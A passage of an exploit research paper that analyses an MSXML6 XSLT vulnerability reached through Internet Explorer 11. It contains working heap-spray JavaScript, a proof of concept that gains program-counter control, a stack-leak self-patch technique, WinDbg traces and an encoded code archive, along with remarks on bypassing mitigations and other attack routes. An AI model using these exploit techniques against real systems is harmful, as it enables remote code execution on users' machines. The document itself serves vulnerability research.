PNG. The PNG compression is very simple and does not affect the bitmap structure at large. As a result, a 2Mb BMP image containing a simple 1-byte pattern can be converted into a ~500 bytes PNG image, that will be decompressed back into the original bitmap in the rendering process memory. There are two problems however: 1. The more variable is the source bitmap pattern, the bigger is the resulting PNG image; a natural limitation of any compression. 2. The decompressed PNG has extra bytes in the bitmap data, injected after every 3 bytes of the original bitmap. It's probably a transparency channel or some other data specific to the PNG format. The good news: 1. At the point when the PNG image is loaded and decompressed by the browser but is not yet displayed on the web page, the bitmap data in the process memory fully corresponds to the source BMP. 2. A large image is mapped into a comparably large and continuous chunk of memory, located at a somewhat predictable memory offset. The PNG spraying technique proved to be not suitable for this particular case because a highly variable memory padding pattern would be required, and so the images would have to be too big anyway. However it still looks like an interesting technique for rapid filling of huge memory areas with a simple byte pattern. --[ 3.5 - Filling the memory 2: integers After testing various memory filling techniques, I've finally settled on integer arrays. The following JavaScript code will quickly fill 400Mb of the memory of Internet Explorer 11 with a continuous constant-dword spray: var intArr = new Array; var count = (0x19000000-0x20)/4; intArr[0] = 0x01c0ffee; // marker // s 0 l?80000000 ee ff c0 01 for(var i=1; i<=count; i++) intArr[i] = 0x17151715; alert('done'); It's curious to note that varying the values in the spraying loop may sometimes result in an internal exception in IE, e.g. when trying to fill more than 400 Mb of the browser memory, or using an 'AAAA' integer equivalent for the filling. This looks like a protection from heap spraying, but it does not pose a major obstacle to the task. The resulting memory filling is distributed across two big and continuous allocations as follows: 0:028> s 0 l?80000000 ee ff c0 01 0531b4f0 ee ff c0 01 f8 ff ff ff-00 00 00 00 00 00 00 00 ............. ; just the marker dword, not relevant 08391860 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. ; a <0x200 bytes chunk, not relevant 085dd0d8 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. ; a <0x10 bytes chunk, not relevant 085de510 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. ; a <0x200 bytes chunk, not relevant 12da5a18 ee ff c0 01 e3 ff c0 01-ce ff c3 01 b8 ff cc 01 ............. ; random garbage 2c540020 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. ; the array, part 1 3eec0020 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. ; the array, part 2 The first allocation looks like simply unfinished, stopped around 300Mb, while the second allocation is full, and both of them are contiguous: 0:028> s 0 l?80000000 ee ff c0 01 ... 2c540020 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3eec0020 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. 0:028> ? 3eec0020-2c540020 Evaluate expression: 311951360 = 12980000 0:028> db 2c540020+12980000-30 ; this is the borderline between the 1st and the 2nd allocations 3eebfff0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ............. 3eec0000 00 00 00 00 90 c4 fb 1e-00 00 00 00 00 00 00 00 ............. 3eec0010 00 00 00 00 f9 ff 3f 06-20 f1 be 07 00 00 00 00 ......?. .... 3eec0020 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3eec0030 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3eec0040 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3eec0050 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3eec0060 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 0:028> db 2c540020+12000000 ; end of the 1st allocation is somewhere in between sizes ; 12000000 and 12980000 3e540020 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540030 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540040 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540050 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540060 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540070 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540080 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540090 15 17 15 17 15 17 15 17-15 17 15 17 15 ;the second allocation: 0:028> db 3eec0020+19000000 ; pointers after the end of the allocation 57ec0020 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0030 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0040 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0050 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0060 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0070 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0080 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0090 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 0:028> db 3eec0020+19000000-30 ; end of the second allocation 57ebfff0 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 57ec0000 15 17 15 17 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0010 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0020 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0030 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0040 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0050 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0060 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. Considering the addressing predictability of the allocations, two observations can be made across multiple tests: 1. Both allocations are aligned by 16 pages, added 0x20 bytes header with full page heap setting enabled (or 0x8 with the default setting). 2. The memory addresses of both allocations are highly predictable. In fact, the addresses of the two allocations would vary across the tests by 'just' approximately 0x1'000'000 bytes, which is not significant in terms of a 0x19'000'000+0x12'000'000 nearly continuous controlled memory space: ; windbg script log edited for readability ; produced by re-launching the app and recording the same allocations ; shows the addresses of the two intarray allocations Opened log file 'c:\users\user\desktop\windbg.log' 0x27f30020 0x3a8b0020 Opened log file 'c:\users\user\desktop\windbg.log' 0x283f0020 0x3ad70020 Opened log file 'c:\users\user\desktop\windbg.log' 0x27ea0020 0x3a820020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28530020 0x3aeb0020 Opened log file 'c:\users\user\desktop\windbg.log' 0x284e0020 0x3ae60020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28aa0020 0x3b420020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28e60020 0x3b7e0020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28440020 0x3adc0020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28560020 0x3aee0020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28480020 0x3ae00020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28a00020 0x3b380020 Without researching the exact reasons of the highly predictable memory allocations, it seems logical if not inevitable that, the bigger the allocation, the more predictable its address would be on x86 systems because of the memory space limitation. This speculation is totally confirmed by observations with various allocation sizes. Considering the reliability risks of the allocations disposition in the memory, the expected memory map will likely change in the following situations: 1. Additional modules loaded by the browser, such as a BHO or an ActiveX. This factor cannot possibly be remote-controlled. On the other hand, the average size of an executable module is insignificant in terms of a 400Mb controlled memory allocation, so it shouldn't distort the expected memory map too much. 2. Additional web content processed in the same tab (images loaded, JavaScript executed etc.), that would change the stack situation. Because each IE tab is loaded in a separate process, this factor can be totally controlled by the vulnerable web page. 3. Microsoft changes IE internals. Not possible to control. 4. Full page heap setting enabled or disabled. The full page heap setting changes the entire memory layout significantly enough that the vulnerability control code must be fine-tuned with this regard specifically. All in all, at that point the memory landing space looks safe enough to be addressed. --[ 3.6 - Recursion control Having the control over the continuous region of memory in the range [0x28000000,0x57000000], it would probably be the safest to direct the crashing pointer in the middle of the range, e.g. around 0x47000000. To achieve this, the JavaScript recursion count must be specifically calculated to reach the crashing procedure around the stack offset of 0x...4700. The size of one JavaScript recursion frame in Internet Explorer 11 is 0x320, each frame corresponding to one cycle of the factorial algorithm: ; JavaScript factorial algorithm recursion on the stack 0529b0d4 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8 0529b0e0 0x86c0fd9 0529b428 jscript9!Js::InterpreterStackFrame::Process+0xbd7 0529b544 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8 0529b550 0x86c0fd9 0529b898 jscript9!Js::InterpreterStackFrame::Process+0xbd7 0529b9b4 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8 0529b9c0 0x86c0fd9 Provided that the vulnerable browser will crash randomly around the stack offsets 0x...ac00 to 0x...b300, the stack must be inflated by 0xb650(+-0x350)-0x4700=0x6f50(+-0x350) bytes, which requires (0x6f50+-0x350)/0x320=35+-1 cycles of recursion, or the call to factorial(35). Indeed, testing this would cause an access violation around the desired address: (268.2a4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=489019b1 ebx=1a819ff0 ecx=1a819f42 edx=6f6e4430 esi=1a819f40 edi=19b14770 eip=6f6f9c85 esp=19b1476c ebp=19b14888 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 msxml6!XEngine::stns+0x6: 6f6f9c85 mov edx,dword ptr [eax+8] ds:0023:489019b9=???????? --[ 3.7 - Program counter control According to the vulnerable XCode execution logic, the address of the dynamic call in XEngine::brns() is retrieved via three consecutive dereferences from the crashing pointer: msxml6!XEngine::stns: 6f6f9c7f mov eax,dword ptr [ecx+0B0h] ; retrieved ptr0 (eax) 6f6f9c85 mov edx,dword ptr [eax+8] ; ptr0 -> crash / ptr1 (edx) 6f6f9c88 push esi 6f6f9c89 lea esi,[edx+0Ch] 6f6f9c8c mov dword ptr [eax+8],esi 6f6f9c8f mov eax,dword ptr [edx+4] ; ptr1 -> ptr2 (eax) 6f6f9c92 push 8 6f6f9c94 mov dword ptr [ecx+0A4h],eax ; store ptr2 6f6f9c9a pop eax 6f6f9c9b pop esi 6f6f9c9c ret ... msxml6!XEngine::brns: 712da250 mov edi,edi 712da252 push esi 712da253 mov esi,ecx 712da255 mov ecx,dword ptr [esi+0A4h];restore ptr2 (2 bytes randomized) 712da25b mov eax,dword ptr [ecx] ; ptr2 -> ptr3 (eax) 712da25d call dword ptr [eax] ; ptr3 -> shellcode Thus, the landing memory contents at ptr0 must satisfy the following dereference logic: Ptr0 (initial AV / address in the spray ) -> ptr1 -> ptr2 -> ptr3 -> shellcode In the above chain of pointers, pointers 1 and 3 are precise, as they are read from the memory padding; but pointer 0 is random within a 100Mb range due to the nature of the bug, and pointer 2 is only page-precise due to the 2-byte memory alignment differences in the procedures where the pointer is stored and then restored. Thanks to the randomized memory access only on the 0th and the 2nd pointers, two split memory areas are required to contain the entire dereference chain, one part (and the first dereferenced) containing the pointers to the second part, the second part containing the pointers to the shellcode, and the presize addresses treated specifically: function poc() { // !!! +hpa required !!! // bp msxml6!xengine::stns; bp msxml6!xengine::brns; g; var intArr = new Array; intArr[0] = 0x01c0ffee; // marker // s 0 l?80000000 ee ff c0 01 var count = (0x19000000-0x20)/4; // 400 Mb for(var i=1; i<=count; i++) { // part1: ptr0/ptr1 read if ( i<(0x12000000/4) ) { if ( ((i*4+0x20)&0xffff) == (0x3c3c+4) ) //if it's a ptr1 read intArr[i] = 0x54545454; // then yield ptr2 else intArr[i] = 0x3c3c3c3c; // otherwise, ptr1 } // part2: ptr2 read else intArr[i] = 0x00badd1e; // ptr3 -> shell code } crash(); } The numerical values in the script were chosen empirically with the full page heap enabled; tweak them if anything doesn't work. And the result should be: (ddc.f28): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00badd1e ebx=11f71ff0 ecx=5454492c edx=5454492c esi=11f71f40 edi=04ef4740 eip=6f6fa25d esp=04ef4738 ebp=04ef4858 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 msxml6!XEngine::brns+0xd: 6f6fa25d ff10 call dword ptr [eax] ds:0023:00badd1e=???????? --[ 4 - The self-patch The next section will discuss the possible useful application of the gained control over the vulnerability without any shell code execution: self-patching of the vulnerable process. --[ 4.1 - A leak without a leak Unlike many memory corruption vulnerabilities, this particular one does not allow for an arbitrary memory write that could be used to leak some information allowing to bypass DEP and ASLR and to execute arbitrary code within the IE sandbox. But the nature of the vulnerability would still allow for a small and limited information leak, which can be used to restore the memory values, required to continue the normal execution ( CoE) of the vulnerable application. Specifically, because the crashing pointer contains the upper word of the stack offset in its lower part due to the misaligned memory read, and the controlled memory space is page-aligned, it is possible to 'leak' part of the stack address by translating the accessed memory address into the value read from that address with the help of the carefully calculated memory padding. There are a few key points to understand about our precisely patterned padding. 1. We start with the idea that each dword in the spray must contain the value of its own offset to the page. Page-size patterning is enough because we only want to leak about 2 bytes of the stack address. 2. Next, we calculate all pattern values based on the spray loop counter as follows: i_pattern = i*4%0x1000; 3. We ensure that the aligned spray will as well align in memory by allocating a big enough continuous chunk of memory. Big memory allocations tend to be 16-pages aligned, i.e. starting with an address like 0xXYZQ0000 (see also windbg.log above), which looks like a sane memory optimization strategy with the heap manager. 4. Next, because the padding must resolve two consecutive memory dereferences while preserving the leaked bits of data inside the actual pointers, we split the page-sized pattern in two halves and fill them differently: else if (i_pattern < 0x0700) intArr[i] = ptr12base + ptr1; else intArr[i] = ptr12base + ptr2; This trick is only possible because of very little entropy observed in the high-order part of the randomly allocated stack offset, which tends to be around 0x04xxxxxx-0x06xxxxxx. Hence we in fact only want to leak 11 bits of the address and not 16, for which a 0x700 bytes pattern is sufficient. 5. We differentiate the pointers in the two parts of the pattern by adding and removing a hand-picked, semi-random delta value to the leaking part of the pointer: var delta = 0x3300; 6. Finally, we adjust the calculations to the values of the respective dereference indexes, e.g. [eax+8] for the first read, as well as to the size of the heap header, which is 0x20 with full page heap: ptr1 = (i_pattern - 8 + 0x20 + delta); ptr2 = (i_pattern - 4 + 0x20 - (delta&0xfff)); Note that we mindfully use a delta value bigger than the size of the pattern, and then we also preserve the 2 higher bits of the added delta value in the 2nd stage pointers, that will eventually increase the reliability of the padding in the cases of misaligned memory access by ensuring that the majority of bytes in the spray will be equal to 0x38, and thus the final pointer will likely point into the controlled memory around 0x38xxxxxx, regardless of both the reading alignment and the leaked bits in the pointer. As a result of the correctly calculated and a correctly positioned padding, the initially read memory offset will re-surface in the program as the low-order word of the value that's eventually read from the range 0x3838xxxx: 0:007> dd 4b6004e0+8 ; 4b6004e0 = the original AV pointer ; 0th read // mov edx,dword ptr [eax+8] 4b6004e8 383837e0 383837e4 383837e8 383837ec 4b6004f8 383837f0 383837f4 383837f8 383837fc 4b600508 38383800 38383804 38383808 3838380c 4b600518 38383810 38383814 38383818 3838381c 4b600528 38383820 38383824 38383828 3838382c 4b600538 38383830 54545454 38383838 3838383c 4b600548 38383840 38383844 38383848 3838384c 4b600558 38383850 38383854 38383858 3838385c 0:007> dd 383837e0+4 ; 1st read // 04e0 is the high word of the stack address 383837e4 383804e0 383804e4 383804e8 383804ec 383837f4 383804f0 383804f4 383804f8 383804fc 38383804 38380500 38380504 38380508 3838050c 38383814 38380510 38380514 38380518 3838051c 38383824 38380520 38380524 38380528 3838052c 38383834 38380530 38380534 54545454 3838053c 38383844 38380540 38380544 38380548 3838054c 38383854 38380550 38380554 38380558 3838055c The read value, that is the two leaked bytes of the stack offset, will then be used by the application itself to restore the original 3rd pointer, which results in retrieving of the correct address of the dynamic call in XEngine::brns(), and resuming of the program execution like if there was no vulnerability: 0:007> p ; our crafted value (read from the memory padding) ; with 2 leaked bytes of the stack address 04e0: eax=383804e0 ... ; write the crafted value msxml6!XEngine::stns+0x15: 6f6f9c94 8981a4000000 mov dword ptr [ecx+0A4h],eax ; value written via the misaligned pointer: 0:007> dd ecx+a4 l1 11b3dfe6 4c1404e0 ; value read via the sane pointer: 0:007> dd ecx+a4-2 11b3dfe4 04e04c2c ; looks good: 0:007> dds 04e04c2c 04e04c2c 6f6e44b8 msxml6!RTFNodeSet::`vftable' ; the original call pointer restored: 0:007> dds poi 04e04c2c 6f6e44b8 6f6e44d5 msxml6!XPSingleTextNav::_getParent And the result is the target application passing the crash-inducing code without a crash: *------------------------* | Message from webpage X | |------------------------| | | | Look, no calc! | | | | / OK / | *------------------------* --[ 4.2 - The offset-to-value translation As per my testing boxen, the upper word of the stack address would never exceed 0x06xx, and thus the crashing pointer would always fall within the first 0x700 bytes of the target memory page, so the remaining 0x900 bytes of the page may be used for the translation purposes: var i_pattern = i*4%0x1000; // index into the current page ptr1 = (i_pattern - 8 + 0x20 + delta); ptr2 = (i_pattern - 4 + 0x20 - (delta&0xfff)); if (i_pattern < 0x0700) intArr[i] = ptr12base + ptr1; else intArr[i] = ptr12base + ptr2; The problem here is that the original crashing pointer is not guaranteed to be correctly aligned, while the memory translation pattern must be dword-aligned. That is, the correctly aligned memory access will result in reading a value like 0x3838XYZQ from the spray, where XYZQ are the leaked bits of the stack offset. But let's see what's read with a misaligned pointer: a. off by 1: 0x38XYZQ38 In this case the pointer still falls into the controlled memory area, but the XY bits of the leaked stack address will be mangled, because we can only guarantee 64Kb alignment of memory allocations. b. off by 2: 0xXYZQ3838 All bits of the stack address are lost, and the pointer looks unpredictable. But we can still enforce this to point to the controlled memory around 0x38xxxxxx by adding a specially crafted delta value of 0x3300 to calculated pointers in the spray as was mentioned earlier. So, e.g. the read value 0x07073838 will become a valid pointer to 0x3a373838. This is possible because the high 4 bits of the stack offset tend to be zero. c. off by 3: 0xZQ3838XY Most important bits of the stack offset are lost in this case, and also the ZQ leaked bits are highly entropic and cannot be made predictable as in the case b. Not much can be done with this case, that's likely to point into random memory and possibly cause an access violation. One thing to notice about the misalignment cases above is that both pointers a. and b. quite logically end with 0x38 that we use as the pattern base. So, we can catch 2 out of 3 misalignment cases in the code by checking the final byte against this value, and then address them specifically e.g. to fall back to raw EIP control instead of allowing a crash: // the address ends with 0x38+4: if ( ((i*4+0x20)&0xff) == (pbyte+4) ) intArr[i] = ptrcall; ... 0:007> r eax=4fc0055e ; the crashing pointer ... 0:007> dd eax+8 ; 0th read: misaligned 4fc00566 38603838 38643838 38683838 386c3838 4fc00576 38703838 38743838 38783838 387c3838 4fc00586 38803838 38843838 38883838 388c3838 4fc00596 38903838 38943838 38983838 389c3838 4fc005a6 38a03838 38a43838 38a83838 38ac3838 4fc005b6 38b03838 38b43838 38b83838 38bc3838 4fc005c6 38c03838 38c43838 38c83838 38cc3838 4fc005d6 38d03838 38d43838 38d83838 38dc3838 0:007> dd 38603838+4 ; 1st read: special value 3860383c 54545454 3838053c 38380540 38380544 3860384c 38380548 3838054c 38380550 38380554 3860385c 38380558 3838055c 38380560 38380564 3860386c 38380568 3838056c 38380570 38380574 3860387c 38380578 3838057c 38380580 38380584 3860388c 38380588 3838058c 38380590 38380594 3860389c 38380598 3838059c 383805a0 383805a4 386038ac 383805a8 383805ac 383805b0 383805b4 0:007> dd 54545454 ; 2nd read / call address 54545454 00badd1e 00badd1e 00badd1e 00badd1e 54545464 00badd1e 00badd1e 00badd1e 00badd1e 54545474 00badd1e 00badd1e 00badd1e 00badd1e Regarding the last, 3-bytes misaligned memory access case that reads pointers like 0xZQ3838XY where ZQ is totally random, this is asking to precisely control the contents of entire memory space of the process, that may be not impossible but is likely not worth it. So I leave it alone as a crash. The final code is:
On my testing boxes, the final proof-of-concept code yields a self-patch in 25% of test cases, a fallback control in 50% of cases, and the inevitable crash in 25% of cases. This result agrees with the theoretical expectation of the maximal possible gain from the offset translation approach. The previous code-execution only proof-of-concept code should yield EIP control in 100% of test cases. --[ 5 - Further work Taking the bug to arbitrary code execution is considered out of scope for this paper, but let's review the state of the art. Although the bug itself allows for the full control over the program counter, as it was showed with the proof-of-concept provided in the section 3.7, such a possibility is inherently burdened with two factors: 1. A heap spray is required due to the entropic nature of the bug, that makes the pc control less reliable, if not... 2. ...if not impossible, in the case of x64 bit systems with memory too wide to spray. Few years ago a browser EIP control would be considered a 'game end'. But today it's just the beginning of a completely different game, or rather, of two different games: mitigations bypass for a sandboxed code execution, and a sandbox bypass for the arbitrary code execution. In this game, Internet Explorer 11 is possibly the 2nd best hardened popular product, after the Google Chrome. Each major version of IE in the past years has introduced a major improvement to the system of security mitigations, up to the point when Microsoft was able to back and test the state of the product security with a $100k worth Bypass bounty, which says a lot. Another important indicator is the statistics for real IE11 exploits that may be observed both ITW (in the wild) and in the metasploit, that's pretty scarce. Among the dozens of mitigations included in the modern IE[4], many old mitigations have become largely irrelevant, along with the corresponding classes of bugs that were gradually audited out of existence (such as buffer overflows and the corresponding GS stack cookie mitigation). On the other hand, the newer mitigations for more realistic classes of bugs such as Use-after-free are still too weak, e.g. the IsolatedHeap which is only selectively relevant to certain bugs, or MemoryProtection which includes the side-walks allowing to bypass it in practice[5]. The new Control Flow Guard included in Windows 8.1 has been bypassed both in the wild and in research[6] even before its full backward deployment on the still-popular systems like Windows 7. Only two mitigations before the sandbox are universally frustrating for a binary researcher regardless of a bug class: DEP strictly in conjunction with a forced ASLR. The ForceASLR mitigation was introduced in IE10, and wiped a whole class of easy and reliable DEP+ASLR bypass techniques which relied upon both system and 3rd party DLLs compiled without the explicit support for ASLR, allowing for constructing an executable ROP chain with pieces of their code at known addresses. Another opportunity that allowed to bypass DEP+ASLR in a generic way was utilizing executable memory pages generated by 'Just in time' compiler of Adobe Flash.[7] This technique had been mitigated early on, although it's not clear whether it's completely dead. In any case, it is limited due to the Adobe Flash dependency. The main[stream] technique used today to bypass DEP+ASLR is to leak some information about the process address space via a memory-leaking opportunity, typically a forced memory leak with a memory corruption vulnerability.[8] The most common way observed to force a memory leak is to corrupt a client-readable object in a certain way allowing for removal of the reading limits: such as a BSTR string in JavaScript (which is said to be removed from jscript9.dll with IE9 but can still be accessed in IE11[9]), various arrays in JavaScript and the Vector object in Flash. To achieve such a bypass, either a second vulnerability must be used, or in some cases, the same vulnerability can provide both a code execution and a memory leaking opportunity. Another branch of research worthy of a notice is the class of 'lazy' arbitrary code executions introduced by Chinese researchers[10], that takes a write-what-where vulnerability condition to enable a privileged JavaScript execution instead of dealing with shell codes. This is not a bypass technique in its own, because it still relies on a memory read/ write vulnerability that can provide a memory leak anyway, but rather an example of a minimalist goal-oriented thinking as opposed to the overcomplicated fighting with complications. Jumping back to our bug, it is important to highlight that, because the target software is a global system framework rather than a direct attack surface, IE might be the worst possible attack vector. Instead, one might want to focus on covering a number of secondary vectors, that are less constrained with mitigations (e.g. Microsoft Office for which an ASLR bypass should no be an issue). As it ws shown in the Table in the section 2.2, it's possible to trigger the bug in Office 2007 via an embedded JavaScript. Another possibility to mention, that MS Word has a poorly documented functionality for using XML templates with XSL transformation functionality, that might possibly be a vector as well. And most importantly, many internet-facing web applications based on ASP.net might be vulnerable with maybe a no-user-interaction code execution on a Windows server. --[ 6 - Conclusion In this paper we have thoroughly analyzed and demonstrated a certain control over a curious specimen of a critical modern vulnerability in a core Microsoft product, which somehow remained undercover for 2 years despite of the publicly available trigger. We have also introduced a few bits of previously unpublished information concerning MSXML internals, JavaScript 9 internals, heap spraying with images as well as general heap spraying in the latest Internet Explorer. In order to analyze and control a modern binary vulnerability, a set of distinct operations is applied, all of which we have revisited: impact vectors research, crash dump analysis, exploitability estimation, patch binary analysis, and root cause analysis. A seemingly uninteresting bug, previously discarded by automated tools and superficial analysis, may turn out to be exploitable as a result of an all-round investigation. There may exist a multitude of ways to remotely reach a particular vulnerability, apart from the most obvious (and likely the most constrained) attack vector. Deducing any specific vulnerability details from a vulnerability patch only, such as the triggering inputs or the root cause, may be extremely hard or impossible due to both the binary diffing complexities of large amounts of binary code modifications and the possibility of a seemingly irrelevant code being changed. A bit-accurate precision of the crafted input may be required to take a vulnerability condition such as a read access violation to the control of the program counter through the chain of code constraints along the execution path, as well as an extensive grasp of the operating system internals and a pages-accurate control of the target process memory space. Bits of useful data may be leaked about the crashing context through ordinary memory access operations, even when no explicit information leaking opportunity is provided by the vulnerability. Internet Explorer 11 memory may be filled quickly with controlled data that would be positioned predictably enough to control a highly entropic vulnerability, despite the allocation randomization as well as the possible anti heap-spraying mechanisms in place. Microsoft XSLT technology is implemented as a simple virtual machine, taking the input XSL code through the abstract syntax tree generation with the ASTCodeGen class to 'XCode' compilation with the XCodeGen class, to stateful frame-based computation with the XEngine class. A huge memory spray may be contained in bitmaps, compressed into the PNG format with zero loss. A memory leaking opportunity will be required to take the vulnerability from EIP control to shellcode execution. --[ 7 - Thanks Nicolas for publishing the repro trigger, my ex-boyfriend for the endless supply of cat photos and Nutella, and my grandma for her loving support. --[ 8 - References [1] Microsoft Security Bulletin MS13-002 - Critical - TechNet https://technet.microsoft.com/library/security/ms13-002 [2] Nicolas Gregoire, "Mutation-based fuzzing of XSLT engines" http://www.agarri.fr/kom/archives/2013/02/25/ mutation-based_fuzzing_of_xslt_engines/index.html [3] Greg MacManus, Michael Sutton, "Punk Ode: Hiding Shellcode in Plain Sight" https://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Sutton.pdf [4] Ken Johnson, Matt Miller, "Exploit mitigation improvements in Windows 8" https://media.blackhat.com/bh-us-12/Briefings/M_Miller/ BH_US_12_Miller_Exploit_Mitigation_Slides.pdf [5] Yuki Chen, "The Birth of a Complete IE11 Exploit Under the New Exploit Mitigations" https://www.syscan.org/index.php/download/ [6] Zhang Yunhai, "Bypass Control Flow Guard comprehensively" https://www.blackhat.com/docs/us-15/materials/us-15-Zhang-Bypass- Control-Flow-Guard-Comprehensively-wp.pdf [7] Dion Blazakis, "Interpreter Exploitation. Pointer Inference and JIT Spraying" http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf [8] Fermin J. Serna, "The info leak era on software exploitation" https://media.blackhat.com/bh-us-12/Briefings/Serna/ BH_US_12_Serna_Leak_Era_Slides.pdf [9] Yang Yu, "Write Once, Pwn Anywhere" https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once- Pwn-Anywhere.pdf [10] Yuki Chen, "Exploit IE using scriptable ActiveX controls" http://www.slideshare.net/xiong120/exploit-ie-using-scriptable- active-x-controls-version-english --[ 9 - Code begin 644 code.tar.gz M'XL(`!:!EE4``^U9VV[;1A#-JP+X'\8"VI!Q)5Y$2;9U*0+D,6X>FH<`01"L MR*7$A!=UN;(D%/F(YHL[LTOJXMBQG4"NV^XQ8"[W,C,[,SM[)(59Y#PY,%S7 M[??[H)Z]KGJZ?J"?%<#SNT$WZ/>[K@^NY[O]X`ET#VT885%*)M`4EB8E^\8\ MG!;'WQBO]K%Y_DL08OPE+V7[8WDP';?%O^][=?R[W6Z`\>\$OO<$W(-9M(/_ M>?R!L"K3L,@ES^7HV1!?SDNY3GDYXUS"*DOS\AP[1\V9E/-SQUDNE^UEIUV( MJ>.=G9TY;W]_Y;P1+"_C0F1-N.2B3(I\U/3:;G.LQ$F>S5,F.>0LXZ-FQI+\ M0]W7A(S)<#9J.M5DE-+B+)Q!R5,>RE'S>37`YO-TW:K7E^;4$O;[GS\;'#TM%&*\(W@?)3S);P(97+)W[Z>?$2[ MK.9%B;[QVR]?7[PLPD6&WFOW<,LV+4-1\D?6M=."16\O7EG;T-@[YK1E[>_? MBHA;]2J:G?\>U7]S_@^/L`Q%,I=P MZ#O`X'$BX0>G?_?B?YW`Q?/O]?V>X7\/`8R_"'E[)K/T8#INB;_?[74V_,]W M*?X=O`!,_7\(#(^C(I3K.0=*@?'1T^'FR5F$3VSI*T*UXT4>$F<"Q1DL&XZ> M_JEIBR&0UQ+(QT"_Z\".O0.PX<'Q_#R6S.0/`_ M%HG@$?6HD76,JBD3>`9#A2:[%U.?H&3<0,!EFH+I^&DQ@L7$G*?*W,"6P@%S9H/3WT',M*G@%PW:<$Z[<]6>E!]5 M9N$FH$)#<+D0.7A57^,S3=W84XWF\'Q7`;3`(R%HP=#9%*^ALZUHDR):0Y'3 M"1DUMRL[KCUHXHS&D$X!)#C(]+M#':H5Q;D:F%0#^$["H^12=0M>TJ'!BN-@ ME];FD#IM`=76?[KD[P'O?RR3<6M.1>U`-."6^S_H!<'F_O<4_PMZ7?/]SX/` MW/_F_K_W_4\50Q6,'V(!-Y&`1\D!Z):4PK64VY)\:K?&^.ZI_WYKO+DN:1U> MM*S==E>!VVY#:TSOIYW3%6+[MD;0FW(C%&+WPJW,FT_6F'?JWCY5]F`BKF&9 MR!EDO)Z#-O@35M(\2RT8#OW`/JG;7H\N8\?12I4G4%#*\@CW`!AKD#..;L8\ M9BF*S0JQ!A:&O"QW-)`1RH*0I>&"CD,$L2@RM7C.IAR*."ZYW"[Q[[\$)Z;[ M7$;[DIJU[VY@*)60B*>2:8=U7*T=Z0DJQNUB6F;%);9I)9\*/J5#3<9XI503 MJ.WC<\\)P`1GI7)ZDE>V2[0@URE!':A"50'TWR21N&*">M`&CYR-RV%1:K4\ M1W^'6FFY4.+C10I>2\4YP^LG3:8YCZZ&X6X,5`U_J*Q#)R"/_$D;H1R1Y!%? MT7DJE/YP(006!!4)S04I+;C\4D*<8!R4C7,\;R!9DNJDP_1+\KT04,BV]';\ M%;U%FC0:4MR1=\4!%:Q2)USEI;?[3@%$Z`#C<^5)[8>GV5JWM3@WIJ"RPU5U-Q MVZYY,Q6:&\)UCD0T32$8;)0O M,?/A!O5(0)'-:B?7L=IP>#)@N],A>;/ONO9U&JNR